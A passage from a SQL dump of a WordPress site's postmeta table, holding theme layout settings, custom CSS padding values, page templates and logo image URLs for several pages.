!important;}'),(3949,2566,'qodef_page_content_behind_header_meta','no'),(3950,2566,'qodef_boxed_background_image_attachment_meta','fixed'),(3951,2566,'qodef_disable_vertical_header_background_image_meta','no'),(3952,2566,'qodef_disable_header_widget_logo_area_meta','no'),(3953,2566,'qodef_disable_header_widget_menu_area_meta','no'),(3954,2566,'qodef_page_content_top_padding','0'),(3955,2566,'qodef_page_content_top_padding_mobile','yes'),(3956,2566,'qodef_header_type_meta','header-standard'),(3957,2566,'qodef_title_area_type_meta','breadcrumbs'),(3958,2566,'qodef_title_area_height_meta','140'),(3959,2566,'qodef_title_area_title_tag_meta','h2'),(3960,2566,'_dp_original','1338'),(3961,2566,'qodef_set_menu_area_position_meta','center'),(3962,2566,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3963,2566,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3964,2566,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3965,2566,'qodef_top_bar_meta','no'),(3966,2577,'_wpb_shortcodes_custom_css','.vc_custom_1521032229394{padding-top: 90px !important;padding-bottom: 55px !important;}.vc_custom_1521032241419{padding-top: 90px !important;padding-bottom: 55px !important;}'),(3967,2577,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3968,2577,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3969,2577,'_wp_page_template','full-width.php'),(3970,2577,'slide_template','default'),(3971,2577,'_wpb_vc_js_status','true'),(3972,2577,'qodef_page_content_behind_header_meta','no'),(3973,2577,'qodef_boxed_background_image_attachment_meta','fixed'),(3974,2577,'qodef_disable_vertical_header_background_image_meta','no'),(3975,2577,'qodef_disable_header_widget_logo_area_meta','no'),(3976,2577,'qodef_disable_header_widget_menu_area_meta','no'),(3977,2577,'qodef_page_content_top_padding','0'),(3978,2577,'qodef_page_content_top_padding_mobile','yes'),(3979,2577,'qodef_header_type_meta','header-standard'),(3980,2577,'qodef_title_area_type_meta','breadcrumbs'),(3981,2577,'qodef_title_area_height_meta','140'),(3982,2577,'qodef_title_area_title_tag_meta','h2'),(3983,2577,'_dp_original','1338'),(3984,2577,'_wpb_shortcodes_custom_css','.vc_custom_1521032229394{padding-top: 90px !important;padding-bottom: 55px !important;}.vc_custom_1521032241419{padding-top: 90px !important;padding-bottom: 55px !important;}'),(3985,2577,'qodef_set_menu_area_position_meta','center'),(3986,2577,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3987,2577,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3988,2577,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3989,2577,'qodef_top_bar_meta','no'),(3990,2593,'_wpb_shortcodes_custom_css','.vc_custom_1521033703747{padding-top: 56px !important;padding-bottom: 76px !important;}'),(3991,2593,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3992,2593,'_wpb_shortcodes_custom_css','.vc_custom_1521033703747{padding-top: 56px !important;padding-bottom: 76px !important;}'),(3993,2593,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3994,2593,'_wp_page_template','full-width.php'),(3995,2593,'slide_template','default'),(3996,2593,'_wpb_vc_js_status','true'),(3997,2593,'_wpb_shortcodes_custom_css','.vc_custom_1521033703747{padding-top: 56px !important;padding-bottom: 76px !important;}'),(3998,2593,'qodef_page_content_behind_header_meta','no'),(3999,2593,'qodef_boxed_background_image_attachment_meta','fixed'),(4000,2593,'qodef_disable_vertical_header_background_image_meta','no'),(4001,2593,'qodef_disable_header_widget_logo_area_meta','no'),(4002,2593,'qodef_disable_header_widget_menu_area_meta','no'),(4003,2593,'qodef_page_content_top_padding','0'),(4004,2593,'qodef_page_content_top_padding_mobile','yes'),(4005,2593,'qodef_header_type_meta','header-standard'),(4006,2593,'qodef_title_area_type_meta','breadcrumbs'),(4007,2593,'qodef_title_area_height_meta','140'),(4008,2593,'qodef_title_area_title_tag_meta','h2'),(4009,2593,'qodef_set_menu_area_position_meta','center'),(4010,2593,'_dp_original','1338'),(4011,2593,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4012,2593,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4013,2593,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4014,2593,'qodef_top_bar_meta','no'),(4015,1433,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4016,1433,'qodef_page_content_behind_header_meta','no'),(4017,1433,'qodef_boxed_background_image_attachment_meta','fixed'),(4018,1433,'qodef-portfolio-image-gallery','1435,1434,1445'),(4019,1433,'qodef_portfolio_single_template_meta','huge-images'),(4020,1433,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4021,1433,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4022,1433,'portfolio_single_back_to_link','1730'),(4023,1433,'qodef_disable_vertical_header_background_image_meta','no'),(4024,1433,'qodef_disable_header_widget_logo_area_meta','no'),(4025,1433,'qodef_disable_header_widget_menu_area_meta','no'),(4026,1433,'slide_template','default'),(4027,1433,'_wpb_vc_js_status','true'),(4028,1433,'qodef_title_area_type_meta','breadcrumbs'),(4029,1433,'qodef_page_content_top_padding','76'),(4030,1433,'qodef_page_content_top_padding_mobile','yes'),(4031,1433,'qodef_title_area_height_meta','140'),(4032,1433,'qodef_title_area_in_grid_meta','no'),(4033,1433,'qodef_title_area_title_tag_meta','h2'),(4034,1433,'_thumbnail_id','1520'),(4035,1433,'_wp_old_slug','full-width-images'),(4036,1437,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4037,1437,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4038,1437,'qodef_page_content_behind_header_meta','no'),(4039,1437,'qodef_boxed_background_image_attachment_meta','fixed'),(4040,1437,'qodef-portfolio-image-gallery','1435,1434,1445'),(4041,1437,'qodef_portfolio_single_template_meta','images'),(4042,1437,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4043,1437,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4044,1437,'portfolio_single_back_to_link','1730'),(4045,1437,'qodef_disable_vertical_header_background_image_meta','no'),(4046,1437,'qodef_disable_header_widget_logo_area_meta','no'),(4047,1437,'qodef_disable_header_widget_menu_area_meta','no'),(4048,1437,'slide_template','default'),(4049,1437,'_wpb_vc_js_status','true'),(4050,1437,'qodef_title_area_type_meta','breadcrumbs'),(4051,1437,'qodef_page_content_top_padding','76'),(4052,1437,'qodef_page_content_top_padding_mobile','yes'),(4053,1437,'qodef_title_area_height_meta','140'),(4054,1437,'qodef_title_area_title_tag_meta','h2'),(4055,1437,'_dp_original','1433'),(4056,1437,'_wp_old_slug','full-width-images'),(4057,1437,'_wp_old_slug','full-width-images-2'),(4058,1437,'_wp_old_slug','images'),(4059,1437,'_thumbnail_id','1525'),(4060,1437,'_wp_old_slug','big-images'),(4061,2611,'_wpb_shortcodes_custom_css','.vc_custom_1521033788363{padding-top: 83px !important;}.vc_custom_1521033801282{padding-bottom: 44px !important;}'),(4062,2611,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4063,2611,'_wpb_shortcodes_custom_css','.vc_custom_1521033788363{padding-top: 83px !important;}.vc_custom_1521033801282{padding-bottom: 44px !important;}'),(4064,2611,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4065,2611,'_wp_page_template','full-width.php'),(4066,2611,'slide_template','default'),(4067,2611,'_wpb_vc_js_status','true'),(4068,2611,'_wpb_shortcodes_custom_css','.vc_custom_1521033788363{padding-top: 83px !important;}.vc_custom_1521033801282{padding-bottom: 44px !important;}'),(4069,2611,'qodef_page_content_behind_header_meta','no'),(4070,2611,'qodef_boxed_background_image_attachment_meta','fixed'),(4071,2611,'qodef_disable_vertical_header_background_image_meta','no'),(4072,2611,'qodef_disable_header_widget_logo_area_meta','no'),(4073,2611,'qodef_disable_header_widget_menu_area_meta','no'),(4074,2611,'qodef_page_content_top_padding','0'),(4075,2611,'qodef_page_content_top_padding_mobile','yes'),(4076,2611,'qodef_header_type_meta','header-standard'),(4077,2611,'qodef_title_area_type_meta','breadcrumbs'),(4078,2611,'qodef_title_area_height_meta','140'),(4079,2611,'qodef_title_area_title_tag_meta','h2'),(4080,2611,'qodef_set_menu_area_position_meta','center'),(4081,2611,'_dp_original','1338'),(4082,2611,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4083,2611,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4084,2611,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4085,2611,'qodef_top_bar_meta','no'),(4086,2620,'_wpb_shortcodes_custom_css','.vc_custom_1521032341492{padding-top: 100px !important;padding-bottom: 100px !important;}'),(4087,2620,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4088,2620,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4089,2620,'_wp_page_template','full-width.php'),(4090,2620,'slide_template','default'),(4091,2620,'_wpb_vc_js_status','true'),(4092,2620,'qodef_page_content_behind_header_meta','no'),(4093,2620,'qodef_boxed_background_image_attachment_meta','fixed'),(4094,2620,'qodef_disable_vertical_header_background_image_meta','no'),(4095,2620,'qodef_disable_header_widget_logo_area_meta','no'),(4096,2620,'qodef_disable_header_widget_menu_area_meta','no'),(4097,2620,'qodef_page_content_top_padding','0'),(4098,2620,'qodef_page_content_top_padding_mobile','yes'),(4099,2620,'qodef_header_type_meta','header-standard'),(4100,2620,'qodef_title_area_type_meta','breadcrumbs'),(4101,2620,'qodef_title_area_height_meta','140'),(4102,2620,'qodef_title_area_title_tag_meta','h2'),(4103,2620,'qodef_set_menu_area_position_meta','center'),(4104,2620,'_dp_original','1338'),(4105,2620,'_wpb_shortcodes_custom_css','.vc_custom_1521032341492{padding-top: 100px !important;padding-bottom: 100px !important;}'),(4106,2620,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4107,2620,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4108,2620,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4109,2620,'qodef_top_bar_meta','no'),(4110,2630,'_wpb_shortcodes_custom_css','.vc_custom_1521033929360{padding-top: 80px !important;padding-bottom: 52px !important;}.vc_custom_1514474729617{padding-bottom: 52px !important;}.vc_custom_1521033943753{padding-bottom: 92px !important;}'),(4111,2630,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4112,2630,'_wpb_shortcodes_custom_css','.vc_custom_1521033929360{padding-top: 80px !important;padding-bottom: 52px !important;}.vc_custom_1514474729617{padding-bottom: 52px !important;}.vc_custom_1521033943753{padding-bottom: 92px !important;}'),(4113,2630,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4114,2630,'_wp_page_template','full-width.php'),(4115,2630,'slide_template','default'),(4116,2630,'_wpb_vc_js_status','true'),(4117,2630,'_wpb_shortcodes_custom_css','.vc_custom_1521033929360{padding-top: 80px !important;padding-bottom: 52px !important;}.vc_custom_1514474729617{padding-bottom: 52px !important;}.vc_custom_1521033943753{padding-bottom: 92px !important;}'),(4118,2630,'qodef_page_content_behind_header_meta','no'),(4119,2630,'qodef_boxed_background_image_attachment_meta','fixed'),(4120,2630,'qodef_disable_vertical_header_background_image_meta','no'),(4121,2630,'qodef_disable_header_widget_logo_area_meta','no'),(4122,2630,'qodef_disable_header_widget_menu_area_meta','no'),(4123,2630,'qodef_page_content_top_padding','0'),(4124,2630,'qodef_page_content_top_padding_mobile','yes'),(4125,2630,'qodef_header_type_meta','header-standard'),(4126,2630,'qodef_title_area_type_meta','breadcrumbs'),(4127,2630,'qodef_title_area_height_meta','140'),(4128,2630,'qodef_title_area_title_tag_meta','h2'),(4129,2630,'qodef_set_menu_area_position_meta','center'),(4130,2630,'_dp_original','1338'),(4131,2630,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4132,2630,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4133,2630,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4134,2630,'qodef_top_bar_meta','no'),(4135,2635,'_wpb_shortcodes_custom_css','.vc_custom_1521028428063{padding-top: 100px !important;padding-bottom: 55px !important;}.vc_custom_1521028444998{padding-top: 100px !important;padding-bottom: 55px !important;}'),(4136,2635,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4137,2635,'_wpb_shortcodes_custom_css','.vc_custom_1521028428063{padding-top: 100px !important;padding-bottom: 55px !important;}.vc_custom_1521028444998{padding-top: 100px !important;padding-bottom: 55px !important;}'),(4138,2635,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4139,2635,'_wp_page_template','full-width.php'),(4140,2635,'slide_template','default'),(4141,2635,'_wpb_vc_js_status','true'),(4142,2635,'_wpb_shortcodes_custom_css','.vc_custom_1521028428063{padding-top: 100px !important;padding-bottom: 55px !important;}.vc_custom_1521028444998{padding-top: 100px !important;padding-bottom: 55px !important;}'),(4143,2635,'qodef_page_content_behind_header_meta','no'),(4144,2635,'qodef_boxed_background_image_attachment_meta','fixed'),(4145,2635,'qodef_disable_vertical_header_background_image_meta','no'),(4146,2635,'qodef_disable_header_widget_logo_area_meta','no'),(4147,2635,'qodef_disable_header_widget_menu_area_meta','no'),(4148,2635,'qodef_page_content_top_padding','0'),(4149,2635,'qodef_page_content_top_padding_mobile','yes'),(4150,2635,'qodef_header_type_meta','header-standard'),(4151,2635,'qodef_title_area_type_meta','breadcrumbs'),(4152,2635,'qodef_title_area_height_meta','140'),(4153,2635,'qodef_title_area_title_tag_meta','h2'),(4154,2635,'qodef_set_menu_area_position_meta','center'),(4155,2635,'_dp_original','1338'),(4156,2635,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4157,2635,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4158,2635,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4159,2635,'qodef_top_bar_meta','no'),(4160,2644,'_wpb_shortcodes_custom_css','.vc_custom_1521032549202{padding-top: 100px !important;padding-bottom: 60px !important;}.vc_custom_1521032563137{padding-top: 100px !important;padding-bottom: 60px !important;}'),(4161,2644,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4162,2644,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4163,2644,'_wp_page_template','full-width.php'),(4164,2644,'slide_template','default'),(4165,2644,'_wpb_vc_js_status','true'),(4166,2644,'qodef_page_content_behind_header_meta','no'),(4167,2644,'qodef_boxed_background_image_attachment_meta','fixed'),(4168,2644,'qodef_disable_vertical_header_background_image_meta','no'),(4169,2644,'qodef_disable_header_widget_logo_area_meta','no'),(4170,2644,'qodef_disable_header_widget_menu_area_meta','no'),(4171,2644,'qodef_page_content_top_padding','0'),(4172,2644,'qodef_page_content_top_padding_mobile','yes'),(4173,2644,'qodef_header_type_meta','header-standard'),(4174,2644,'qodef_title_area_type_meta','breadcrumbs'),(4175,2644,'qodef_title_area_height_meta','140'),(4176,2644,'qodef_title_area_title_tag_meta','h2'),(4177,2644,'qodef_set_menu_area_position_meta','center'),(4178,2644,'_dp_original','1338'),(4179,2644,'_wpb_shortcodes_custom_css','.vc_custom_1521032549202{padding-top: 100px !important;padding-bottom: 60px !important;}.vc_custom_1521032563137{padding-top: 100px !important;padding-bottom: 60px !important;}'),(4180,2644,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4181,2644,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4182,2644,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4183,2644,'qodef_top_bar_meta','no'),(4184,2651,'_wpb_shortcodes_custom_css','.vc_custom_1521031348557{padding-top: 100px !important;padding-bottom: 95px !important;}'),(4185,2651,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4186,2651,'_wpb_shortcodes_custom_css','.vc_custom_1521031348557{padding-top: 100px !important;padding-bottom: 95px !important;}'),(4187,2651,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4188,2651,'_wp_page_template','full-width.php'),(4189,2651,'slide_template','default'),(4190,2651,'_wpb_vc_js_status','true'),(4191,2651,'_wpb_shortcodes_custom_css','.vc_custom_1521031348557{padding-top: 100px !important;padding-bottom: 95px !important;}'),(4192,2651,'qodef_page_content_behind_header_meta','no'),(4193,2651,'qodef_boxed_background_image_attachment_meta','fixed'),(4194,2651,'qodef_disable_vertical_header_background_image_meta','no'),(4195,2651,'qodef_disable_header_widget_logo_area_meta','no'),(4196,2651,'qodef_disable_header_widget_menu_area_meta','no'),(4197,2651,'qodef_page_content_top_padding','0'),(4198,2651,'qodef_page_content_top_padding_mobile','yes'),(4199,2651,'qodef_header_type_meta','header-standard'),(4200,2651,'qodef_title_area_type_meta','breadcrumbs'),(4201,2651,'qodef_title_area_height_meta','140'),(4202,2651,'qodef_title_area_title_tag_meta','h2'),(4203,2651,'qodef_set_menu_area_position_meta','center'),(4204,2651,'_dp_original','1338'),(4205,2651,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4206,2651,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4207,2651,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4208,2651,'qodef_top_bar_meta','no'),(4209,2659,'_wpb_shortcodes_custom_css','.vc_custom_1521032660602{padding-top: 100px !important;padding-bottom: 70px !important;}.vc_custom_1521032673502{padding-top: 100px !important;padding-bottom: 70px !important;}'),(4210,2659,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4211,2659,'_wpb_shortcodes_custom_css','.vc_custom_1521032660602{padding-top: 100px !important;padding-bottom: 70px !important;}.vc_custom_1521032673502{padding-top: 100px !important;padding-bottom: 70px !important;}'),(4212,2659,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4213,2659,'_wp_page_template','full-width.php'),(4214,2659,'slide_template','default'),(4215,2659,'_wpb_vc_js_status','true'),(4216,2659,'_wpb_shortcodes_custom_css','.vc_custom_1521032660602{padding-top: 100px !important;padding-bottom: 70px !important;}.vc_custom_1521032673502{padding-top: 100px !important;padding-bottom: 70px !important;}'),(4217,2659,'qodef_page_content_behind_header_meta','no'),(4218,2659,'qodef_boxed_background_image_attachment_meta','fixed'),(4219,2659,'qodef_disable_vertical_header_background_image_meta','no'),(4220,2659,'qodef_disable_header_widget_logo_area_meta','no'),(4221,2659,'qodef_disable_header_widget_menu_area_meta','no'),(4222,2659,'qodef_page_content_top_padding','0'),(4223,2659,'qodef_page_content_top_padding_mobile','yes'),(4224,2659,'qodef_header_type_meta','header-standard'),(4225,2659,'qodef_title_area_type_meta','breadcrumbs'),(4226,2659,'qodef_title_area_height_meta','140'),(4227,2659,'qodef_title_area_title_tag_meta','h2'),(4228,2659,'qodef_set_menu_area_position_meta','center'),(4229,2659,'_dp_original','1338'),(4230,2659,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4231,2659,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4232,2659,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4233,2659,'qodef_top_bar_meta','no'),(4234,2667,'_wpb_shortcodes_custom_css','.vc_custom_1521032783760{padding-top: 59px !important;padding-bottom: 99px !important;}.vc_custom_1521032795656{padding-top: 59px !important;padding-bottom: 99px !important;}'),(4235,2667,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4236,2667,'_wpb_shortcodes_custom_css','.vc_custom_1521032783760{padding-top: 59px !important;padding-bottom: 99px !important;}.vc_custom_1521032795656{padding-top: 59px !important;padding-bottom: 99px !important;}'),(4237,2667,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4238,2667,'_wp_page_template','full-width.php'),(4239,2667,'slide_template','default'),(4240,2667,'_wpb_vc_js_status','true'),(4241,2667,'_wpb_shortcodes_custom_css','.vc_custom_1521032783760{padding-top: 59px !important;padding-bottom: 99px !important;}.vc_custom_1521032795656{padding-top: 59px !important;padding-bottom: 99px !important;}'),(4242,2667,'qodef_page_content_behind_header_meta','no'),(4243,2667,'qodef_boxed_background_image_attachment_meta','fixed'),(4244,2667,'qodef_disable_vertical_header_background_image_meta','no'),(4245,2667,'qodef_disable_header_widget_logo_area_meta','no'),(4246,2667,'qodef_disable_header_widget_menu_area_meta','no'),(4247,2667,'qodef_page_content_top_padding','0'),(4248,2667,'qodef_page_content_top_padding_mobile','yes'),(4249,2667,'qodef_header_type_meta','header-standard'),(4250,2667,'qodef_title_area_type_meta','breadcrumbs'),(4251,2667,'qodef_title_area_height_meta','140'),(4252,2667,'qodef_title_area_title_tag_meta','h2'),(4253,2667,'qodef_set_menu_area_position_meta','center'),(4254,2667,'_dp_original','1338'),(4255,2667,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4256,2667,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4257,2667,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4258,2667,'qodef_top_bar_meta','no'),(4259,2676,'_wpb_shortcodes_custom_css','.vc_custom_1521028100240{padding-top: 80px !important;}.vc_custom_1521028135335{padding-top: 45px !important;padding-bottom: 97px !important;}'),(4260,2676,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4261,2676,'_wpb_shortcodes_custom_css','.vc_custom_1521028100240{padding-top: 80px !important;}.vc_custom_1521028135335{padding-top: 45px !important;padding-bottom: 97px !important;}'),(4262,2676,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4263,2676,'_wp_page_template','full-width.php'),(4264,2676,'slide_template','default'),(4265,2676,'_wpb_vc_js_status','true'),(4266,2676,'_wpb_shortcodes_custom_css','.vc_custom_1521028100240{padding-top: 80px !important;}.vc_custom_1521028135335{padding-top: 45px !important;padding-bottom: 97px !important;}'),(4267,2676,'qodef_page_content_behind_header_meta','no'),(4268,2676,'qodef_boxed_background_image_attachment_meta','fixed'),(4269,2676,'qodef_disable_vertical_header_background_image_meta','no'),(4270,2676,'qodef_disable_header_widget_logo_area_meta','no'),(4271,2676,'qodef_disable_header_widget_menu_area_meta','no'),(4272,2676,'qodef_page_content_top_padding','0'),(4273,2676,'qodef_page_content_top_padding_mobile','yes'),(4274,2676,'qodef_header_type_meta','header-standard'),(4275,2676,'qodef_title_area_type_meta','breadcrumbs'),(4276,2676,'qodef_title_area_height_meta','140'),(4277,2676,'qodef_title_area_title_tag_meta','h2'),(4278,2676,'qodef_set_menu_area_position_meta','center'),(4279,2676,'_dp_original','1338'),(4280,2676,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4281,2676,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4282,2676,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4283,2676,'qodef_top_bar_meta','no'),(4284,2689,'_wpb_shortcodes_custom_css','.vc_custom_1521028210502{padding-top: 100px !important;padding-bottom: 43px !important;}.vc_custom_1521028305161{padding-bottom: 106px !important;}'),(4285,2689,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4286,2689,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4287,2689,'_wp_page_template','full-width.php'),(4288,2689,'slide_template','default'),(4289,2689,'_wpb_vc_js_status','true'),(4290,2689,'qodef_page_content_behind_header_meta','no'),(4291,2689,'qodef_boxed_background_image_attachment_meta','fixed'),(4292,2689,'qodef_disable_vertical_header_background_image_meta','no'),(4293,2689,'qodef_disable_header_widget_logo_area_meta','no'),(4294,2689,'qodef_disable_header_widget_menu_area_meta','no'),(4295,2689,'qodef_page_content_top_padding','0'),(4296,2689,'qodef_page_content_top_padding_mobile','yes'),(4297,2689,'qodef_header_type_meta','header-standard'),(4298,2689,'qodef_title_area_type_meta','breadcrumbs'),(4299,2689,'qodef_title_area_height_meta','140'),(4300,2689,'qodef_title_area_title_tag_meta','h2'),(4301,2689,'qodef_set_menu_area_position_meta','center'),(4302,2689,'_dp_original','1338'),(4303,2689,'_wpb_shortcodes_custom_css','.vc_custom_1521028210502{padding-top: 100px !important;padding-bottom: 43px !important;}.vc_custom_1521028305161{padding-bottom: 106px !important;}'),(4304,2689,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4305,2689,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4306,2689,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4307,2689,'qodef_top_bar_meta','no'),(4308,2700,'_wpb_shortcodes_custom_css','.vc_custom_1521031444492{padding-top: 100px !important;padding-bottom: 63px !important;}.vc_custom_1521031454830{padding-top: 100px !important;padding-bottom: 63px !important;}'),(4309,2700,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4310,2700,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4311,2700,'_wp_page_template','full-width.php'),(4312,2700,'slide_template','default'),(4313,2700,'_wpb_vc_js_status','true'),(4314,2700,'qodef_page_content_behind_header_meta','no'),(4315,2700,'qodef_boxed_background_image_attachment_meta','fixed'),(4316,2700,'qodef_disable_vertical_header_background_image_meta','no'),(4317,2700,'qodef_disable_header_widget_logo_area_meta','no'),(4318,2700,'qodef_disable_header_widget_menu_area_meta','no'),(4319,2700,'qodef_page_content_top_padding','0'),(4320,2700,'qodef_page_content_top_padding_mobile','yes'),(4321,2700,'qodef_header_type_meta','header-standard'),(4322,2700,'qodef_title_area_type_meta','breadcrumbs'),(4323,2700,'qodef_title_area_height_meta','140'),(4324,2700,'qodef_title_area_title_tag_meta','h2'),(4325,2700,'qodef_set_menu_area_position_meta','center'),(4326,2700,'_dp_original','1338'),(4327,2700,'_wpb_shortcodes_custom_css','.vc_custom_1521031444492{padding-top: 100px !important;padding-bottom: 63px !important;}.vc_custom_1521031454830{padding-top: 100px !important;padding-bottom: 63px !important;}'),(4328,2700,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4329,2700,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4330,2700,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4331,2700,'qodef_top_bar_meta','no'),(4332,2705,'_wpb_shortcodes_custom_css','.vc_custom_1521031761743{padding-top: 15px !important;padding-bottom: 95px !important;}.vc_custom_1521031775260{padding-top: 15px !important;padding-bottom: 95px !important;}'),(4333,2705,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4334,2705,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4335,2705,'_wp_page_template','full-width.php'),(4336,2705,'slide_template','default'),(4337,2705,'_wpb_vc_js_status','true'),(4338,2705,'qodef_page_content_behind_header_meta','no'),(4339,2705,'qodef_boxed_background_image_attachment_meta','fixed'),(4340,2705,'qodef_disable_vertical_header_background_image_meta','no'),(4341,2705,'qodef_disable_header_widget_logo_area_meta','no'),(4342,2705,'qodef_disable_header_widget_menu_area_meta','no'),(4343,2705,'qodef_page_content_top_padding','0'),(4344,2705,'qodef_page_content_top_padding_mobile','yes'),(4345,2705,'qodef_header_type_meta','header-standard'),(4346,2705,'qodef_title_area_type_meta','breadcrumbs'),(4347,2705,'qodef_title_area_height_meta','140'),(4348,2705,'qodef_title_area_title_tag_meta','h2'),(4349,2705,'qodef_set_menu_area_position_meta','center'),(4350,2705,'_dp_original','1338'),(4351,2705,'_wpb_shortcodes_custom_css','.vc_custom_1521031761743{padding-top: 15px !important;padding-bottom: 95px !important;}.vc_custom_1521031775260{padding-top: 15px 